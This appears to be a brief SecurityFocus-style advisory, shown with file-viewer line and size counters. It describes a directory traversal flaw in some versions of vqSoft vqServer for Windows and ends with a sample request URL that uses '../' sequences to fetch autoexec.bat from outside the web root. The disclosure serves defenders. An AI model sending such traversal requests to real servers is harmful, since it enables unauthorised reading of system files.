5 lines
No EOL
352 B
Text
5 lines
No EOL
352 B
Text
source: https://www.securityfocus.com/bid/1067/info
|
|
|
|
Some versions of vqSoft vqServer for Windows are vulnerable to the common ../../ method of retrieving known files from outside of the web directory structure, accomplished by appending a variable number of "../" and a known filename to an HTTP GET request.
|
|
|
|
http://target/../../../../../autoexec.bat |